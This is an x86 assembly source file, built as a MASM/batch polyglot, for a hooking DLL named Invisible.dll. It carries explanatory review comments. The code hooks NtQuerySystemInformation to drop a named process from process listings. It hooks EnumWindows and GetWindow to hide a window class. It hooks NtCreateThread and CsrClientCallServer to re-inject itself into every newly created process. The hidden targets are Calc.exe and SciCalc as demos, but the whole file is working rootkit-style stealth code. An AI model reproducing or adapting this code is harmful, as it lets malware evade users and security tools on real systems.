;@goto translate
; Dual-purpose file: the line above is a comment to MASM but a GOTO to cmd.exe,
; which jumps straight to the :translate label at the end of the file where the
; assemble/link commands live. MASM in turn stops at END and never sees that
; batch tail, so the two halves never parse each other's text.
.586P
.MODEL FLAT, STDCALL                     ; 32-bit flat model; every PROC below uses the stdcall frame/epilogue
OPTION CASEMAP: NONE
INCLUDE WINDOWS.inc
UNICODE = FALSE                          ; presumably selects the ANSI entry points for the Win32 calls below; the one wide string is declared with TEXTW explicitly
INCLUDE APIMACRO.mac                     ; supplies the iWin32 / iWin32i / sWin32 call macros and the TEXT* string macros (bodies not visible here)
INCLUDELIB iKERNEL32.lib
INCLUDELIB iUSER32.lib
INCLUDELIB iNTDLL.lib
INCLUDELIB iApiHooks.lib                 ; hook-engine library; BeginHooks/MkHook/EndHooks and (presumably) EstablishApiHooksTime come from here
INCLUDE ApiHooks.inc
OPTION NOKEYWORD: <LENGTH>               ; frees LENGTH so NewNtQuerySystemInformation can name a parameter "Length"
.DATA?
; 32-bit layout of the NT PROCESS_BASIC_INFORMATION record. Only
; UniqueProcessId is actually read by the hooks below.
PROCESS_BASIC_INFORMATION STRUCT
ExitStatus DWORD ?
PebBaseAddress DWORD ?
AffinityMask DWORD ?
BasePriority DWORD ?
UniqueProcessId DWORD ?
InheritedFromUniqueProcessId DWORD ?
PROCESS_BASIC_INFORMATION ENDS
ProcessBasicInformation = 0              ; PROCESSINFOCLASS value passed to NtQueryInformationProcess
SystemProcessInformation = 5             ; SYSTEM_INFORMATION_CLASS value filtered in NewNtQuerySystemInformation
OrigEnumWinProc DWORD ?                  ; caller's EnumWindows callback while NewEnumProc stands in for it; NULL when idle
pbi PROCESS_BASIC_INFORMATION <>         ; PBI of the target process sampled before the original NtCreateThread runs
pbi2 PROCESS_BASIC_INFORMATION <>        ; PBI sampled after a suspended first thread was created; .UniqueProcessId is read by NewCsrClientCallServer
PathHooks SIGN MAX_PATH DUP (?)          ; this DLL's own path, filled in by DllMain and handed to EstablishApiHooksTime
; NOTE(review): everything above is a plain global with no synchronisation, so
; hooks running on several threads at once interleave their updates.
.CODE
; Hook table consumed by the ApiHooks library (macro semantics live in
; ApiHooks.inc, not shown here). Each MkHook line names a module and an export;
; the replacement is the New<export> PROC of the same name further down.
; "Entry" is presumably the label BeginHooks defines; it is the single
; anonymous export requested on the link line in the batch tail. The extra
; HOOK_BY_ADDRESS / KERNEL32 fields on the first two entries look like a
; hook-mode selector plus the importing module -- unconfirmed.
BeginHooks Entry
MkHook , NTDLL, NtCreateThread, HOOK_BY_ADDRESS, KERNEL32
MkHook , NTDLL, CsrClientCallServer, HOOK_BY_ADDRESS, KERNEL32
MkHook , NTDLL, NtQuerySystemInformation
MkHook ,USER32, EnumWindows
MkHook ,USER32, GetWindow
EndHooks
; Zero-terminated name strings referenced by the hook table above; the
; "/0" appears to be the macro's notation for the terminating zero. The
; macros expose the data as s<Name> (sProc2Hide and sWind2Hide are used below).
TEXTA NTDLL, <NTDLL.dll/0>
TEXTA KERNEL32, <KERNEL32.dll/0>
TEXTA USER32, <USER32.dll/0>
TEXTA NtCreateThread, <NtCreateThread/0>
TEXTA CsrClientCallServer, <CsrClientCallServer/0>
TEXTA NtQuerySystemInformation, <NtQuerySystemInformation/0>
TEXTA EnumWindows, <EnumWindows/0>
TEXTA GetWindow, <GetWindow/0>
TEXTW Proc2Hide, <Calc.exe/0>            ; wide string: image name removed from SystemProcessInformation results (compared with lstrcmpiW)
TEXT Wind2Hide, <SciCalc/0>              ; window class passed as FindWindow's first argument; that window is dropped from EnumWindows/GetWindow
;--------------------------------------------------------------------------------
; BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
; Plain label rather than a PROC, so the arguments are reached through ESP:
;   [ESP+4] = hinstDLL, [ESP+8] = fdwReason, [ESP+12] = lpvReserved.
; On DLL_PROCESS_ATTACH it stores this module's own path in PathHooks; every
; reason returns TRUE. RETN 12 pops the three stdcall arguments.
DllMain:
CMP DWORD PTR [ESP+8], DLL_PROCESS_ATTACH
JNE @F
; The [ESP+12] operand is evaluated after the macro has already pushed the two
; later arguments (assumes right-to-left push order), so it resolves to
; hinstDLL rather than lpvReserved.
iWin32i GetModuleFileName, [ESP+12], OFFSET PathHooks, MAX_PATH
@@:
PUSH TRUE                                ; EAX = TRUE via push/pop (does not touch flags)
POP EAX
RETN 12
;--------------------------------------------------------------------------------
; Replacement for ntdll!NtCreateThread (same eight stdcall parameters; the
; original NTSTATUS is returned unchanged).
; Purpose: notice the creation of a *new* process's first thread. A freshly
; created process reports UniqueProcessId == 0 until its first thread exists,
; so the PID is sampled into pbi before the original call and, if the target
; was still ID-less and the thread was created suspended, into pbi2 afterwards.
; pbi2 is later consumed by NewCsrClientCallServer.
; Registers: ECX is scratch. Writes the unsynchronised globals pbi and pbi2.
NewNtCreateThread PROC lpThreadHandle, DesiredAccess, lpObjectAttributes,\
ProcessHandle, lpClientId, lpInitialContext,\
lpUserStackDescriptor, CreateSuspended
AND pbi2.UniqueProcessId, 0              ; pbi2.UniqueProcessId = 0 (clear the "new PID" slot)
iWin32 NtQueryInformationProcess, ProcessHandle, ProcessBasicInformation,\
OFFSET pbi, SIZEOF pbi, NULL
PUSH EAX                                 ; keep the status of the pre-call query
iWin32 NtCreateThread, lpThreadHandle, DesiredAccess, lpObjectAttributes,\
ProcessHandle, lpClientId, lpInitialContext,\
lpUserStackDescriptor, CreateSuspended
POP ECX                                  ; ECX = pre-call query status
PUSH EAX                                 ; preserve the original NtCreateThread status for the return
TEST ECX, ECX
JL @F                                    ; NTSTATUS < 0: the pre-call query failed
TEST EAX, EAX
JL @F                                    ; thread creation itself failed
CMP CreateSuspended, FALSE
JE @F                                    ; only suspended creation is of interest
CMP pbi.UniqueProcessId, 0 ;new process hasn't ID before 1st thread creation
JNE @F                                   ; target already had a PID -> not a new process
iWin32 NtQueryInformationProcess, ProcessHandle, ProcessBasicInformation,\
OFFSET pbi2, SIZEOF pbi2, NULL           ; PID is assigned now; capture it in pbi2
@@:
POP EAX                                  ; restore the original NTSTATUS
RET
NewNtCreateThread ENDP
;--------------------------------------------------------------------------------
; Replacement for ntdll!CsrClientCallServer(lpStruc, Par1, dwCommand, StrucSize).
; Lets the original call through and returns its EAX. Afterwards, for command
; 10000H only (presumably the process-creation message -- not confirmed here),
; when the DWORD at lpStruc+20H is non-negative (treated as an NTSTATUS result)
; and NewNtCreateThread has left a PID in pbi2, it calls EstablishApiHooksTime
; with this DLL's path, that PID and the constant 10000 (unit not visible;
; looks like a timeout). The library routine's behaviour is not shown here.
; pbi2 is not reset afterwards; it keeps its value until NewNtCreateThread
; next clears it.
NewCsrClientCallServer PROC lpStruc, Par1, dwCommand, StrucSize
iWin32 CsrClientCallServer, lpStruc, Par1, dwCommand, StrucSize
CMP dwCommand, 10000H
JNE @F
MOV EDX, lpStruc
CMP DWORD PTR [EDX+20H], 0               ; sign bit set -> the server reported failure; skip
JL @F
MOV ECX, pbi2.UniqueProcessId            ; PID recorded by NewNtCreateThread, 0 if none
JECXZ @F
PUSH EAX                                 ; keep the original return value across the call
iWin32i EstablishApiHooksTime, OFFSET PathHooks, ECX, 10000
POP EAX
@@:
RET
NewCsrClientCallServer ENDP
;--------------------------------------------------------------------------------
; Replacement for ntdll!NtQuerySystemInformation(SystemInformationClass,
; SystemInformation, Length, ResultLength). Calls the original and returns its
; NTSTATUS. For SystemProcessInformation it then walks the returned buffer as a
; chain of records linked by the DWORD at offset 0 (NextEntryOffset) and
; unlinks every record whose wide-string pointer at offset 3CH (matches
; ImageName.Buffer in the 32-bit SYSTEM_PROCESS_INFORMATION layout) compares
; case-insensitively equal to sProc2Hide.
; Registers: ESI = record being examined, EBX = the record visited just before
; it (USES restores both for the caller). Nothing here verifies that the
; offsets read stay inside Length / ResultLength.
NewNtQuerySystemInformation PROC USES EBX ESI, SystemInformationClass, SystemInformation,\
Length, ResultLength
iWin32 NtQuerySystemInformation, SystemInformationClass, SystemInformation,\
Length, ResultLength
TEST EAX, EAX
JL Fin                                   ; NTSTATUS < 0: nothing to filter
CMP SystemInformationClass, SystemProcessInformation
JNE Fin
MOV ESI, SystemInformation
@@:
MOV EBX, ESI ;prev proc
CMP DWORD PTR [ESI], 0                   ; NextEntryOffset == 0 -> last record reached
JE Fin
ADD ESI, [ESI]                           ; ESI = next record
MOV ECX, [ESI+3CH]                       ; ECX = image-name buffer pointer
JECXZ @B                                 ; no name: skip
PUSH EAX                                 ; keep the NTSTATUS across lstrcmpiW
iWin32 lstrcmpiW, ECX, sProc2Hide
TEST EAX, EAX
POP EAX                                  ; POP leaves flags alone, so the JNE below still sees the TEST result
JNE @B                                   ; name differs: keep walking
MOV EDX, [ESI]                           ; EDX = matched record's NextEntryOffset
TEST EDX, EDX
JE FillZero
ADD [EBX], EDX                           ; prev.NextEntryOffset += this.NextEntryOffset: the chain skips this record
JMP @B ;all with my name
FillZero:
AND [EBX], EDX                           ; EDX == 0 here: prev becomes the last record in the chain
JMP @B ;all with my name
Fin:
RET
NewNtQuerySystemInformation ENDP
;--------------------------------------------------------------------------------
; Replacement for user32!EnumWindows(lpEnumFunc, lParam).
; Parks the caller's callback in OrigEnumWinProc and runs the real EnumWindows
; with NewEnumProc in its place for the duration. If OrigEnumWinProc is already
; set (an enumeration is in progress, e.g. EnumWindows called from inside a
; callback) the call is passed through unfiltered. OrigEnumWinProc is a single
; global, so enumerations on different threads share it without locking.
; Returns whatever EnumWindows returns in EAX.
NewEnumWindows PROC lpEnumFunc, lParam
CMP OrigEnumWinProc, NULL
JE @F
iWin32 EnumWindows, lpEnumFunc, lParam   ; nested or concurrent call: unfiltered pass-through
RET
@@:
PUSH lpEnumFunc                          ; OrigEnumWinProc = lpEnumFunc
POP OrigEnumWinProc
iWin32 EnumWindows, NewEnumProc, lParam
AND OrigEnumWinProc, NULL                ; release the slot (NULL == 0); EAX is left as EnumWindows returned it
RET
NewEnumWindows ENDP
; BOOL CALLBACK NewEnumProc(HWND hwnd, LPARAM lParam)
; Stand-in callback that NewEnumWindows hands to the real EnumWindows.
; Looks up the window whose class is sWind2Hide; if hwnd is that window the
; callback returns TRUE (keep enumerating) without involving the caller,
; otherwise the caller's callback saved in OrigEnumWinProc is invoked and its
; result returned. ESI is listed in USES but not used in this body.
NewEnumProc PROC USES ESI, hwnd, lParam
iWin32i FindWindow, sWind2Hide, NULL     ; EAX = the window to hide, or NULL if it does not exist
TEST EAX, EAX
JE OrigEnumP
CMP EAX, hwnd
PUSH TRUE                                ; EAX = TRUE; PUSH/POP leave the CMP flags intact
POP EAX
JE @F                                    ; hwnd is the hidden window: report TRUE and say nothing to the caller
OrigEnumP:
sWin32 OrigEnumWinProc, hwnd, lParam     ; call the real callback through the saved pointer
@@:
RET
NewEnumProc ENDP
;--------------------------------------------------------------------------------
; Replacement for user32!GetWindow(hWnd, uCmd).
; Keeps the window whose class is sWind2Hide out of the results: asking for its
; GW_CHILD yields NULL, and whenever the original GetWindow would return that
; handle the walk is repeated from it with the same uCmd so the caller sees a
; neighbour instead. Registers: EBX = handle of the hidden window (USES saves
; the caller's value). Returns EAX exactly as GetWindow does, NULL included.
; NOTE(review): on the NotMe path taken when FindWindow returns NULL, EBX is
; never assigned, so the CMP EAX, EBX near the end compares against whatever
; value the caller left in EBX.
NewGetWindow PROC USES EBX, hWnd, uCmd
iWin32i FindWindow, sWind2Hide, NULL     ; EAX = hidden window, or NULL
TEST EAX, EAX
JE NotMe                                 ; nothing to hide: plain pass-through
MOV EBX, EAX                             ; EBX = hidden window
CMP EAX, hWnd
JNE NotMe
CMP uCmd, GW_CHILD
JNE @F
SUB EAX, EAX                             ; the hidden window reports no children
RET
@@:
iWin32 GetWindow, EAX, uCmd              ; step off the hidden window first; Next/NotMe below then step once more
Next:
MOV hWnd, EAX                            ; continue the walk from the handle just returned
NotMe:
iWin32 GetWindow, hWnd, uCmd
TEST EAX, EAX
JE Fin                                   ; end of the walk
CMP EAX, EBX                             ; landed on the hidden window? take another step
JE Next
Fin:
RET
NewGetWindow ENDP
;--------------------------------------------------------------------------------
END DllMain                              ; image entry point; MASM ignores everything after this line, which is where the batch tail starts
:translate
@echo off
REM Assemble this very file (cmd.exe jumped here from the first line; MASM only
REM reads the part above END) and link the object as a DLL.
ML /c /coff /nologo InvisibleDLL.bat
REM Link options worth knowing when examining the produced image: the single
REM export is anonymous (/export:Entry,@1,NONAME), .rdata is merged into .text,
REM .text is made writable as well as executable (/section:.text,EWR), and a
REM preferred base of 0x47280000 is requested. A writable code section breaks
REM W^X and is a straightforward indicator for static scanners.
eLINK InvisibleDLL /out:Invisible.dll /dll /nologo /optidata /section:.text,EWR /export:Entry,@1,NONAME /base:0x47280000 /SUBSYSTEM:WINDOWS /MERGE:.rdata=.text /IGNORE:4078,4086
REM Remove build by-products; only Invisible.dll is kept.
DEL InvisibleDLL.obj
DEL Invisible.lib
DEL Invisible.exp
PAUSE
CLS